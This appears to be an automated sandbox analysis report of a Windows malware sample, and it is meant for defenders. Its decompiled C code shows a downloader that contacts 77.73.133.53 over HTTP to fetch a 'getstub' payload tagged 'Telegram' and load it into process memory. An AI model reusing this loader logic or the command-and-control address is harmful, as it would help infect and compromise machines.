                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorFreeHeapInformationLastTimeZone
                                                                                                                                      • String ID: Pacific Daylight Time$Pacific Standard Time
                                                                                                                                      • API String ID: 3335090040-1154798116
                                                                                                                                      • Opcode ID: 877a3e4acc8b5d8b97c71345058dca3cc622b250cfdc7d4758fa8b9c524488b6
                                                                                                                                      • Instruction ID: e53ad4cdbb0699d0b2043288f22a963069d5cac080729de91bc83337fbf7bbf1
                                                                                                                                      • Opcode Fuzzy Hash: 877a3e4acc8b5d8b97c71345058dca3cc622b250cfdc7d4758fa8b9c524488b6
                                                                                                                                      • Instruction Fuzzy Hash: 0241E971D00325BBCBD0FFB6DC45A6E7BB9EF85220B144165E924E7190EB709D81CB90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 53 e212f0-e2133c call e21000 WinHttpOpen 56 e2134a-e2136f MultiByteToWideChar 53->56 57 e2133e 53->57 58 e21371-e21379 56->58 59 e2137b-e21396 MultiByteToWideChar 56->59 60 e21340-e21348 57->60 58->58 58->59 61 e213b1-e213c4 59->61 62 e21398-e213ad WinHttpConnect 59->62 60->56 60->60 63 e213c6-e213d3 61->63 62->61 63->63 64 e213d5-e213dc 63->64 65 e213e0-e213e7 64->65 65->65 66 e213e9-e213fe MultiByteToWideChar 65->66 67 e21400-e21408 66->67 67->67 68 e2140a-e2141f MultiByteToWideChar 67->68 69 e21420-e21428 68->69 69->69 70 e2142a-e2143d MultiByteToWideChar 69->70 71 e21440-e21448 70->71 71->71 72 e2144a-e21474 MultiByteToWideChar 71->72 73 e21476-e2147d 72->73 74 e2147f-e21487 72->74 73->73 73->74 75 e214a1-e214b5 74->75 76 e21489-e21490 74->76 78 e214b7-e214bd 75->78 79 e214bf-e214cb 75->79 77 e21492-e2149f 76->77 77->75 77->77 78->78 78->79 80 e214d0-e214dd 79->80 80->80 81 e214df-e214f3 80->81 82 e214f5-e214fb 81->82 83 e214fd-e21508 81->83 82->82 82->83 84 e21525-e2152c 83->84 85 e2150a-e21514 83->85 87 e21578-e2157a 84->87 88 e2152e-e2154e WinHttpOpenRequest 84->88 86 e21516-e21523 85->86 86->84 86->86 89 e21580-e21586 87->89 88->87 90 e21550-e2156b WinHttpSendRequest 88->90 91 e216d8-e216de 89->91 92 e2158c-e21593 89->92 93 e2157c 90->93 94 e2156d-e21576 WinHttpReceiveResponse 90->94 95 e21595-e215a5 GetSystemInfo 92->95 96 e215aa-e215cf VirtualAlloc 92->96 93->89 94->89 95->96 97 e215d3-e215e4 WinHttpQueryDataAvailable 96->97 98 e21680-e2168c 97->98 99 e215ea-e215f6 97->99 100 e21691-e21697 98->100 101 e2168e-e2168f WinHttpCloseHandle 98->101 99->98 102 e215fc-e21601 99->102 103 e21699-e2169a WinHttpCloseHandle 100->103 104 e2169c-e216a2 100->104 101->100 105 e21603-e2160a 102->105 106 e2164e-e21654 102->106 103->104 107 e216a7-e216be GetCurrentProcess call e21700 104->107 108 e216a4-e216a5 WinHttpCloseHandle 104->108 109 e21621-e21646 VirtualAlloc 105->109 110 e2160c-e2161c GetSystemInfo 105->110 111 e21658-e2166b WinHttpReadData 106->111 118 e216c3-e216c8 107->118 108->107 113 e216df-e216e3 109->113 114 e2164c 109->114 110->109 111->98 115 e2166d-e21675 111->115 113->111 114->106 116 e21677 115->116 117 e21678-e2167a 115->117 116->117 117->97 117->98 118->91 119 e216ca-e216d2 VirtualFree 118->119 119->91
                                                                                                                                      C-Code - Quality: 47%
                                                                                                                                      			E00E212F0(void* __eflags) {
                                                                                                                                      				short _v536;
                                                                                                                                      				short _v1136;
                                                                                                                                      				char _v1648;
                                                                                                                                      				char _v1884;
                                                                                                                                      				char _v1904;
                                                                                                                                      				short _v1984;
                                                                                                                                      				intOrPtr _v1992;
                                                                                                                                      				struct _SYSTEM_INFO _v2028;
                                                                                                                                      				intOrPtr _v2032;
                                                                                                                                      				intOrPtr _v2036;
                                                                                                                                      				intOrPtr _v2040;
                                                                                                                                      				void* _v2044;
                                                                                                                                      				char _v2048;
                                                                                                                                      				void* _v2052;
                                                                                                                                      				char _v2056;
                                                                                                                                      				int _v2068;
                                                                                                                                      				intOrPtr _v2072;
                                                                                                                                      				int _v2100;
                                                                                                                                      				intOrPtr _t70;
                                                                                                                                      				void* _t71;
                                                                                                                                      				void* _t75;
                                                                                                                                      				signed int* _t79;
                                                                                                                                      				void* _t80;
                                                                                                                                      				void* _t83;
                                                                                                                                      				void* _t86;
                                                                                                                                      				void* _t89;
                                                                                                                                      				signed int* _t92;
                                                                                                                                      				signed int* _t93;
                                                                                                                                      				signed int* _t94;
                                                                                                                                      				int _t95;
                                                                                                                                      				signed int _t96;
                                                                                                                                      				void* _t98;
                                                                                                                                      				char* _t101;
                                                                                                                                      				intOrPtr _t102;
                                                                                                                                      				void* _t103;
                                                                                                                                      				intOrPtr _t104;
                                                                                                                                      				intOrPtr _t112;
                                                                                                                                      				intOrPtr _t113;
                                                                                                                                      				signed int _t114;
                                                                                                                                      				void* _t120;
                                                                                                                                      				void* _t125;
                                                                                                                                      				void* _t126;
                                                                                                                                      				void* _t127;
                                                                                                                                      				signed int _t128;
                                                                                                                                      				void* _t130;
                                                                                                                                      				int _t131;
                                                                                                                                      				int _t132;
                                                                                                                                      				signed int _t134;
                                                                                                                                      				int _t136;
                                                                                                                                      				signed short _t139;
                                                                                                                                      				signed int _t141;
                                                                                                                                      				signed short _t143;
                                                                                                                                      				char _t145;
                                                                                                                                      				signed int _t146;
                                                                                                                                      				signed int _t147;
                                                                                                                                      				void* _t149;
                                                                                                                                      				void* _t151;
                                                                                                                                      				void* _t154;
                                                                                                                                      				void* _t156;
                                                                                                                                      				void* _t157;
                                                                                                                                      				intOrPtr _t158;
                                                                                                                                      				intOrPtr _t160;
                                                                                                                                      				int _t162;
                                                                                                                                      				void* _t163;
                                                                                                                                      				long _t167;
                                                                                                                                      				intOrPtr* _t168;
                                                                                                                                      				void* _t169;
                                                                                                                                      				signed int _t171;
                                                                                                                                      				signed int _t172;
                                                                                                                                      				void* _t175;
                                                                                                                                      
                                                                                                                                      				_t70 = E00E21000( &(_v2028.dwActiveProcessorMask),  &(_v2028.dwActiveProcessorMask),  &_v1884); // executed
                                                                                                                                      				_t175 = (_t172 & 0xfffffff8) - 0x7ec + 8;
                                                                                                                                      				_t127 = 0;
                                                                                                                                      				_v2028.lpMaximumApplicationAddress = 0;
                                                                                                                                      				_v2028.lpMinimumApplicationAddress.dwOemId = 0;
                                                                                                                                      				__imp__WinHttpOpen(L"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36", 0, 0, 0, 0, _t157, _t163, _t126); // executed
                                                                                                                                      				_t158 = _t70;
                                                                                                                                      				_t71 = 0;
                                                                                                                                      				_v2032 = _t158;
                                                                                                                                      				if(_v1904 == 0) {
                                                                                                                                      					L3:
                                                                                                                                      					_t132 = MultiByteToWideChar(0, 0,  &_v1904, _t71 + 1, 0, 0);
                                                                                                                                      					_t75 = 0;
                                                                                                                                      					if(_v1904 == 0) {
                                                                                                                                      						L5:
                                                                                                                                      						MultiByteToWideChar(0, 0,  &_v1904, _t75 + 1,  &_v536, _t132);
                                                                                                                                      						if(_t158 != 0) {
                                                                                                                                      							_t125 =  &_v536;
                                                                                                                                      							__imp__WinHttpConnect(_t158, _t125, 0x50, 0);
                                                                                                                                      							_t127 = _t125;
                                                                                                                                      							_v2052 = _t125;
                                                                                                                                      						}
                                                                                                                                      						_t79 =  &_v1648;
                                                                                                                                      						_t134 = 0x61;
                                                                                                                                      						_t149 = L"api.php?method=getstub&bid=" - _t79;
                                                                                                                                      						do {
                                                                                                                                      							 *_t79 = _t134;
                                                                                                                                      							_t79 =  &(_t79[0]);
                                                                                                                                      							_t134 =  *(_t149 + _t79) & 0x0000ffff;
                                                                                                                                      						} while (_t134 != 0);
                                                                                                                                      						 *_t79 = 0;
                                                                                                                                      						_t80 = 0;
                                                                                                                                      						do {
                                                                                                                                      							_t80 = _t80 + 1;
                                                                                                                                      						} while ( *((intOrPtr*)(_t80 + "default         ")) != 0);
                                                                                                                                      						_t136 = MultiByteToWideChar(0, 0, "default         ", _t80 + 1, 0, 0);
                                                                                                                                      						_t83 = 0;
                                                                                                                                      						do {
                                                                                                                                      							_t83 = _t83 + 1;
                                                                                                                                      						} while ( *((char*)(_t83 + "default         ")) != 0);
                                                                                                                                      						MultiByteToWideChar(0, 0, "default         ", _t83 + 1,  &_v1984, _t136);
                                                                                                                                      						_t86 = 0;
                                                                                                                                      						do {
                                                                                                                                      							_t86 = _t86 + 1;
                                                                                                                                      						} while ( *((char*)(_t86 + "Telegram                                                                                                                                                                                                                                                       ")) != 0);
                                                                                                                                      						MultiByteToWideChar(0, 0, "Telegram                                                                                                                                                                                                                                                       ", _t86 + 1, 0, 0);
                                                                                                                                      						_t89 = 0;
                                                                                                                                      						do {
                                                                                                                                      							_t89 = _t89 + 1;
                                                                                                                                      						} while ( *((char*)(_t89 + "Telegram                                                                                                                                                                                                                                                       ")) != 0);
                                                                                                                                      						MultiByteToWideChar(0, 0, "Telegram                                                                                                                                                                                                                                                       ", _t89 + 1,  &_v1136, 0xff);
                                                                                                                                      						_t92 =  &_v1648;
                                                                                                                                      						if(_v1648 == 0) {
                                                                                                                                      							L19:
                                                                                                                                      							_t139 = _v1984;
                                                                                                                                      							if(_t139 == 0) {
                                                                                                                                      								L22:
                                                                                                                                      								 *_t92 = 0;
                                                                                                                                      								_t93 =  &_v1648;
                                                                                                                                      								if(_v1648 == 0) {
                                                                                                                                      									L24:
                                                                                                                                      									_t141 = 0x26;
                                                                                                                                      									_t151 = L"&tag=" - _t93;
                                                                                                                                      									do {
                                                                                                                                      										 *_t93 = _t141;
                                                                                                                                      										_t93 =  &(_t93[0]);
                                                                                                                                      										_t141 =  *(_t93 + _t151) & 0x0000ffff;
                                                                                                                                      									} while (_t141 != 0);
                                                                                                                                      									 *_t93 = 0;
                                                                                                                                      									_t94 =  &_v1648;
                                                                                                                                      									if(_v1648 == 0) {
                                                                                                                                      										L28:
                                                                                                                                      										_t143 = _v1136;
                                                                                                                                      										if(_t143 == 0) {
                                                                                                                                      											L31:
                                                                                                                                      											 *_t94 = 0;
                                                                                                                                      											if(_t127 == 0) {
                                                                                                                                      												L35:
                                                                                                                                      												_t95 = 0;
                                                                                                                                      												L37:
                                                                                                                                      												_t160 = 0;
                                                                                                                                      												_t128 = 0;
                                                                                                                                      												if(_t95 == 0) {
                                                                                                                                      													L61:
                                                                                                                                      													return _t95;
                                                                                                                                      												}
                                                                                                                                      												_t96 =  *0xe23000;
                                                                                                                                      												if(_t96 == 0) {
                                                                                                                                      													GetSystemInfo( &(_v2028.lpMinimumApplicationAddress));
                                                                                                                                      													_t96 = _v1992 - 1;
                                                                                                                                      													 *0xe23000 = _t96;
                                                                                                                                      												}
                                                                                                                                      												_t167 = _t96 + 0x04000000 &  !_t96;
                                                                                                                                      												_t98 = VirtualAlloc(0, _t167, 0x2000, 4); // executed
                                                                                                                                      												_v2044 = _t98;
                                                                                                                                      												_t100 =  !=  ? _t167 : _t128;
                                                                                                                                      												_v2028.dwOemId =  !=  ? _t167 : _t128;
                                                                                                                                      												while(1) {
                                                                                                                                      													_t101 =  &_v2048;
                                                                                                                                      													__imp__WinHttpQueryDataAvailable(_v2040, _t101); // executed
                                                                                                                                      													if(_t101 == 0) {
                                                                                                                                      														break;
                                                                                                                                      													}
                                                                                                                                      													_t145 = _v2056;
                                                                                                                                      													if(_v2036 - _t160 < _t145) {
                                                                                                                                      														break;
                                                                                                                                      													}
                                                                                                                                      													_t169 = _t160 + _t145;
                                                                                                                                      													if(_t169 <= _t128) {
                                                                                                                                      														L48:
                                                                                                                                      														_t112 = _v2052 + _t160;
                                                                                                                                      														_v2032 = _t112;
                                                                                                                                      														L49:
                                                                                                                                      														__imp__WinHttpReadData(_v2048, _t112, _t145,  &_v2056);
                                                                                                                                      														if(_t112 == 0) {
                                                                                                                                      															break;
                                                                                                                                      														}
                                                                                                                                      														_t113 = _v2072;
                                                                                                                                      														_t160 = _t160 + _t113;
                                                                                                                                      														if(_t160 > _t128) {
                                                                                                                                      															asm("int3");
                                                                                                                                      														}
                                                                                                                                      														if(_t113 != 0) {
                                                                                                                                      															continue;
                                                                                                                                      														} else {
                                                                                                                                      															break;
                                                                                                                                      														}
                                                                                                                                      													}
                                                                                                                                      													_t114 =  *0xe23000;
                                                                                                                                      													if(_t114 == 0) {
                                                                                                                                      														GetSystemInfo( &_v2028);
                                                                                                                                      														_t114 = _v2028.dwAllocationGranularity - 1;
                                                                                                                                      														 *0xe23000 = _t114;
                                                                                                                                      													}
                                                                                                                                      													_t171 = _t169 + _t114 &  !_t114;
                                                                                                                                      													_t120 = VirtualAlloc(_v2052 + _t128, _t171 - _t128, 0x1000, 4); // executed
                                                                                                                                      													_t145 = _v2056;
                                                                                                                                      													if(_t120 == 0) {
                                                                                                                                      														_t112 = _v2032;
                                                                                                                                      														goto L49;
                                                                                                                                      													} else {
                                                                                                                                      														_t128 = _t171;
                                                                                                                                      														goto L48;
                                                                                                                                      													}
                                                                                                                                      												}
                                                                                                                                      												_t102 = _v2048;
                                                                                                                                      												_t168 = __imp__WinHttpCloseHandle;
                                                                                                                                      												if(_t102 != 0) {
                                                                                                                                      													 *_t168(_t102);
                                                                                                                                      												}
                                                                                                                                      												_t103 = _v2044;
                                                                                                                                      												if(_t103 != 0) {
                                                                                                                                      													 *_t168(_t103);
                                                                                                                                      												}
                                                                                                                                      												_t104 = _v2040;
                                                                                                                                      												if(_t104 != 0) {
                                                                                                                                      													 *_t168(_t104); // executed
                                                                                                                                      												}
                                                                                                                                      												_t130 = _v2052;
                                                                                                                                      												_t95 = E00E21700(GetCurrentProcess(), _t130, _t160, 1, 1, 1, 1, 0); // executed
                                                                                                                                      												if(_t130 != 0) {
                                                                                                                                      													_t95 = VirtualFree(_t130, 0, 0x8000);
                                                                                                                                      												}
                                                                                                                                      												goto L61;
                                                                                                                                      											}
                                                                                                                                      											_t95 =  &_v1648;
                                                                                                                                      											__imp__WinHttpOpenRequest(_t127, L"GET", _t95, 0, 0, 0, 0); // executed
                                                                                                                                      											_t131 = _t95;
                                                                                                                                      											_v2068 = _t131;
                                                                                                                                      											if(_t131 == 0) {
                                                                                                                                      												goto L35;
                                                                                                                                      											}
                                                                                                                                      											__imp__WinHttpSendRequest(_t131, 0, 0, 0, 0, 0, 0); // executed
                                                                                                                                      											_t162 = _t95;
                                                                                                                                      											_v2100 = _t162;
                                                                                                                                      											if(_t162 == 0) {
                                                                                                                                      												_t95 = _v2100;
                                                                                                                                      											} else {
                                                                                                                                      												__imp__WinHttpReceiveResponse(_t131, 0); // executed
                                                                                                                                      											}
                                                                                                                                      											goto L37;
                                                                                                                                      										}
                                                                                                                                      										_t146 = _t143 & 0x0000ffff;
                                                                                                                                      										_t154 =  &_v1136 - _t94;
                                                                                                                                      										do {
                                                                                                                                      											 *_t94 = _t146;
                                                                                                                                      											_t94 =  &(_t94[0]);
                                                                                                                                      											_t146 =  *(_t94 + _t154) & 0x0000ffff;
                                                                                                                                      										} while (_t146 != 0);
                                                                                                                                      										goto L31;
                                                                                                                                      									} else {
                                                                                                                                      										goto L27;
                                                                                                                                      									}
                                                                                                                                      									do {
                                                                                                                                      										L27:
                                                                                                                                      										_t94 =  &(_t94[0]);
                                                                                                                                      									} while ( *_t94 != 0);
                                                                                                                                      									goto L28;
                                                                                                                                      								} else {
                                                                                                                                      									goto L23;
                                                                                                                                      								}
                                                                                                                                      								do {
                                                                                                                                      									L23:
                                                                                                                                      									_t93 =  &(_t93[0]);
                                                                                                                                      								} while ( *_t93 != 0);
                                                                                                                                      								goto L24;
                                                                                                                                      							}
                                                                                                                                      							_t147 = _t139 & 0x0000ffff;
                                                                                                                                      							_t156 =  &_v1984 - _t92;
                                                                                                                                      							do {
                                                                                                                                      								 *_t92 = _t147;
                                                                                                                                      								_t92 =  &(_t92[0]);
                                                                                                                                      								_t147 =  *(_t156 + _t92) & 0x0000ffff;
                                                                                                                                      							} while (_t147 != 0);
                                                                                                                                      							goto L22;
                                                                                                                                      						} else {
                                                                                                                                      							goto L18;
                                                                                                                                      						}
                                                                                                                                      						do {
                                                                                                                                      							L18:
                                                                                                                                      							_t92 =  &(_t92[0]);
                                                                                                                                      						} while ( *_t92 != 0);
                                                                                                                                      						goto L19;
                                                                                                                                      					} else {
                                                                                                                                      						goto L4;
                                                                                                                                      					}
                                                                                                                                      					do {
                                                                                                                                      						L4:
                                                                                                                                      						_t75 = _t75 + 1;
                                                                                                                                      					} while ( *((intOrPtr*)(_t175 + _t75 + 0xa0)) != _t127);
                                                                                                                                      					goto L5;
                                                                                                                                      				} else {
                                                                                                                                      					do {
                                                                                                                                      						_t71 = _t71 + 1;
                                                                                                                                      					} while ( *((intOrPtr*)(_t175 + _t71 + 0xa0)) != 0);
                                                                                                                                      					goto L3;
                                                                                                                                      				}
                                                                                                                                      			}









































































                                                                                                                                      0x00e2130c
                                                                                                                                      0x00e21311
                                                                                                                                      0x00e21314
                                                                                                                                      0x00e21316
                                                                                                                                      0x00e2131a
                                                                                                                                      0x00e21327
                                                                                                                                      0x00e2132d
                                                                                                                                      0x00e2132f
                                                                                                                                      0x00e21331
                                                                                                                                      0x00e2133c
                                                                                                                                      0x00e2134a
                                                                                                                                      0x00e21364
                                                                                                                                      0x00e21366
                                                                                                                                      0x00e2136f
                                                                                                                                      0x00e2137b
                                                                                                                                      0x00e21392
                                                                                                                                      0x00e21396
                                                                                                                                      0x00e2139c
                                                                                                                                      0x00e213a5
                                                                                                                                      0x00e213ab
                                                                                                                                      0x00e213ad
                                                                                                                                      0x00e213ad
                                                                                                                                      0x00e213b1
                                                                                                                                      0x00e213bf
                                                                                                                                      0x00e213c4
                                                                                                                                      0x00e213c6
                                                                                                                                      0x00e213c6
                                                                                                                                      0x00e213c9
                                                                                                                                      0x00e213cc
                                                                                                                                      0x00e213d0
                                                                                                                                      0x00e213d7
                                                                                                                                      0x00e213da
                                                                                                                                      0x00e213e0
                                                                                                                                      0x00e213e0
                                                                                                                                      0x00e213e1
                                                                                                                                      0x00e213fa
                                                                                                                                      0x00e213fc
                                                                                                                                      0x00e21400
                                                                                                                                      0x00e21400
                                                                                                                                      0x00e21401
                                                                                                                                      0x00e2141b
                                                                                                                                      0x00e2141d
                                                                                                                                      0x00e21420
                                                                                                                                      0x00e21420
                                                                                                                                      0x00e21421
                                                                                                                                      0x00e21439
                                                                                                                                      0x00e2143b
                                                                                                                                      0x00e21440
                                                                                                                                      0x00e21440
                                                                                                                                      0x00e21441
                                                                                                                                      0x00e21462
                                                                                                                                      0x00e2146d
                                                                                                                                      0x00e21474
                                                                                                                                      0x00e2147f
                                                                                                                                      0x00e2147f
                                                                                                                                      0x00e21487
                                                                                                                                      0x00e214a1
                                                                                                                                      0x00e214a3
                                                                                                                                      0x00e214a6
                                                                                                                                      0x00e214b5
                                                                                                                                      0x00e214bf
                                                                                                                                      0x00e214c4
                                                                                                                                      0x00e214c9
                                                                                                                                      0x00e214d0
                                                                                                                                      0x00e214d0
                                                                                                                                      0x00e214d3
                                                                                                                                      0x00e214d6
                                                                                                                                      0x00e214da
                                                                                                                                      0x00e214e1
                                                                                                                                      0x00e214e4
                                                                                                                                      0x00e214f3
                                                                                                                                      0x00e214fd
                                                                                                                                      0x00e214fd
                                                                                                                                      0x00e21508
                                                                                                                                      0x00e21525
                                                                                                                                      0x00e21527
                                                                                                                                      0x00e2152c
                                                                                                                                      0x00e21578
                                                                                                                                      0x00e21578
                                                                                                                                      0x00e21580
                                                                                                                                      0x00e21580
                                                                                                                                      0x00e21582
                                                                                                                                      0x00e21586
                                                                                                                                      0x00e216d8
                                                                                                                                      0x00e216de
                                                                                                                                      0x00e216de
                                                                                                                                      0x00e2158c
                                                                                                                                      0x00e21593
                                                                                                                                      0x00e2159a
                                                                                                                                      0x00e215a4
                                                                                                                                      0x00e215a5
                                                                                                                                      0x00e215a5
                                                                                                                                      0x00e215b9
                                                                                                                                      0x00e215be
                                                                                                                                      0x00e215c4
                                                                                                                                      0x00e215cc
                                                                                                                                      0x00e215cf
                                                                                                                                      0x00e215d3
                                                                                                                                      0x00e215d3
                                                                                                                                      0x00e215dc
                                                                                                                                      0x00e215e4
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00e215ee
                                                                                                                                      0x00e215f6
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00e215fc
                                                                                                                                      0x00e21601
                                                                                                                                      0x00e2164e
                                                                                                                                      0x00e21652
                                                                                                                                      0x00e21654
                                                                                                                                      0x00e21658
                                                                                                                                      0x00e21663
                                                                                                                                      0x00e2166b
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00e2166d
                                                                                                                                      0x00e21671
                                                                                                                                      0x00e21675
                                                                                                                                      0x00e21677
                                                                                                                                      0x00e21677
                                                                                                                                      0x00e2167a
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00e2167a
                                                                                                                                      0x00e21603
                                                                                                                                      0x00e2160a
                                                                                                                                      0x00e21611
                                                                                                                                      0x00e2161b
                                                                                                                                      0x00e2161c
                                                                                                                                      0x00e2161c
                                                                                                                                      0x00e21625
                                                                                                                                      0x00e2163a
                                                                                                                                      0x00e21640
                                                                                                                                      0x00e21646
                                                                                                                                      0x00e216df
                                                                                                                                      0x00000000
                                                                                                                                      0x00e2164c
                                                                                                                                      0x00e2164c
                                                                                                                                      0x00000000
                                                                                                                                      0x00e2164c
                                                                                                                                      0x00e21646
                                                                                                                                      0x00e21680
                                                                                                                                      0x00e21684
                                                                                                                                      0x00e2168c
                                                                                                                                      0x00e2168f
                                                                                                                                      0x00e2168f
                                                                                                                                      0x00e21691
                                                                                                                                      0x00e21697
                                                                                                                                      0x00e2169a
                                                                                                                                      0x00e2169a
                                                                                                                                      0x00e2169c
                                                                                                                                      0x00e216a2
                                                                                                                                      0x00e216a5
                                                                                                                                      0x00e216a5
                                                                                                                                      0x00e216a7
                                                                                                                                      0x00e216be
                                                                                                                                      0x00e216c8
                                                                                                                                      0x00e216d2
                                                                                                                                      0x00e216d2
                                                                                                                                      0x00000000
                                                                                                                                      0x00e216c8
                                                                                                                                      0x00e21532
                                                                                                                                      0x00e21540
                                                                                                                                      0x00e21546
                                                                                                                                      0x00e21548
                                                                                                                                      0x00e2154e
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00e2155d
                                                                                                                                      0x00e21563
                                                                                                                                      0x00e21565
                                                                                                                                      0x00e2156b
                                                                                                                                      0x00e2157c
                                                                                                                                      0x00e2156d
                                                                                                                                      0x00e21570
                                                                                                                                      0x00e21570
                                                                                                                                      0x00000000
                                                                                                                                      0x00e2156b
                                                                                                                                      0x00e21511
                                                                                                                                      0x00e21514
                                                                                                                                      0x00e21516
                                                                                                                                      0x00e21516
                                                                                                                                      0x00e21519
                                                                                                                                      0x00e2151c
                                                                                                                                      0x00e21520
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00e214f5
                                                                                                                                      0x00e214f5
                                                                                                                                      0x00e214f5
                                                                                                                                      0x00e214f8
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00e214b7
                                                                                                                                      0x00e214b7
                                                                                                                                      0x00e214b7
                                                                                                                                      0x00e214ba
                                                                                                                                      0x00000000
                                                                                                                                      0x00e214b7
                                                                                                                                      0x00e2148d
                                                                                                                                      0x00e21490
                                                                                                                                      0x00e21492
                                                                                                                                      0x00e21492
                                                                                                                                      0x00e21495
                                                                                                                                      0x00e21498
                                                                                                                                      0x00e2149c
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00e21476
                                                                                                                                      0x00e21476
                                                                                                                                      0x00e21476
                                                                                                                                      0x00e21479
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00e21371
                                                                                                                                      0x00e21371
                                                                                                                                      0x00e21371
                                                                                                                                      0x00e21372
                                                                                                                                      0x00000000
                                                                                                                                      0x00e21340
                                                                                                                                      0x00e21340
                                                                                                                                      0x00e21340
                                                                                                                                      0x00e21341
                                                                                                                                      0x00000000
                                                                                                                                      0x00e21340

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 00E21000: WinHttpOpen.WINHTTP(Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00E2101D
                                                                                                                                        • Part of subcall function 00E21000: MultiByteToWideChar.KERNEL32(00000000,00000000,77.73.133.53,00000002,00000000,00000000), ref: 00E2104E
                                                                                                                                        • Part of subcall function 00E21000: MultiByteToWideChar.KERNEL32(00000000,00000000,77.73.133.53,00000002,?,00000000), ref: 00E21070
                                                                                                                                        • Part of subcall function 00E21000: WinHttpConnect.WINHTTP(00000000,?,00000050,00000000), ref: 00E21082
                                                                                                                                        • Part of subcall function 00E21000: MultiByteToWideChar.KERNEL32(00000000,00000000,1923830098 ,00000002,00000000,00000000), ref: 00E210CF
                                                                                                                                        • Part of subcall function 00E21000: MultiByteToWideChar.KERNEL32(00000000,00000000,1923830098 ,00000002,?,00000000), ref: 00E210EF
                                                                                                                                      • WinHttpOpen.WINHTTP(Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00E21327
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 00E21362
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,?,00000000), ref: 00E21392
                                                                                                                                      • WinHttpConnect.WINHTTP(00000000,?,00000050,00000000), ref: 00E213A5
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,default ,00000002,00000000,00000000), ref: 00E213F8
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,default ,00000002,?,00000000), ref: 00E2141B
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,Telegram ,00000002,00000000,00000000), ref: 00E21439
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,Telegram ,00000002,?,000000FF), ref: 00E21462
                                                                                                                                      • WinHttpOpenRequest.WINHTTP(00000000,GET,?,00000000,00000000,00000000,00000000), ref: 00E21540
                                                                                                                                      • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E2155D
                                                                                                                                      • WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 00E21570
                                                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 00E2159A
                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00002000,00000004), ref: 00E215BE
                                                                                                                                      • WinHttpQueryDataAvailable.WINHTTP(?,?), ref: 00E215DC
                                                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 00E21611
                                                                                                                                      • VirtualAlloc.KERNELBASE(?,?,00001000,00000004), ref: 00E2163A
                                                                                                                                      • WinHttpReadData.WINHTTP(?,?,?,?), ref: 00E21663
                                                                                                                                      • WinHttpCloseHandle.WINHTTP(?), ref: 00E2168F
                                                                                                                                      • WinHttpCloseHandle.WINHTTP(?), ref: 00E2169A
                                                                                                                                      • WinHttpCloseHandle.WINHTTP(?), ref: 00E216A5
                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 00E216B7
                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E216D2
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.505280435.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.505262824.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.505297797.0000000000E22000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.505313351.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_e20000_EgNIXduB6T.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Http$ByteCharMultiWide$CloseHandleOpenVirtual$AllocConnectDataInfoRequestSystem$AvailableCurrentFreeProcessQueryReadReceiveResponseSend
